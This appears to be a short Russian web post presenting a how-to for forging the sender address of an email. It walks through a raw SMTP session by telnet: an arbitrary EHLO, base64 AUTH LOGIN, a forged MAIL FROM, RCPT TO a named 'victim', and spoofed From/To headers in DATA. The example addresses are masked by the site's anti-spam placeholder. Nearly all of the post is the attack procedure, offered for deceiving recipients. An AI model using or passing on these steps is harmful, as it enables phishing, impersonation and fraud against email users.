Новичку полезно

  • А знаете ли вы что?

    - rudvs знает, что ваш малыш желает!


Подмена обратного адреса в email

Теги: почта, подмена, mail, email

Довольно давно обнаружил этот косяк, но не было времени выложить.
В принципе, он кому надо уже известен. Уязвимость заключается в
отсутствии проверки переданных данных с регистрационными в большинстве
почтовых сервисов. Для использования уязвимости требуется знать ESMTP
протокол и иметь шифровальщик base64, например в unix-based ОС часто
встречается утилита base64. Ну, не забываем и про php-функцию.

Коннектимся на порт SMTP

telnet mail.server.ru 25

представляемся:

EHLO 123.123.123.123
- наш ip. он тоже не проверяется - можно писать любую ахинею.

AUTH LOGIN base64login
base64password

где base64login - ваш логин, закодированный в base64.
base64password - пароль в 64

далее:
MAIL FROM Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript
наш обратный адрес: Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript

RCPT TO: i@looser.рф
адрес жертвы: i@looser.рф

Далее
DATA

после этого начинается тело письма
в теле письма пишется откуда оно пришло (повторно, кому предназначено,
в какой кодировке и т.д. и т.п.) Можно ограничиться From: и To:
To:
From: Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript >
Subject: hello, dude!
Где Subject - тема

когда тело закончено пишем перевод каретки, точку, перевод каретки:

.

т.е. .

всё. Жертве приходит письмо с адреса, который мы указали.

Добавить комментарий


Обновить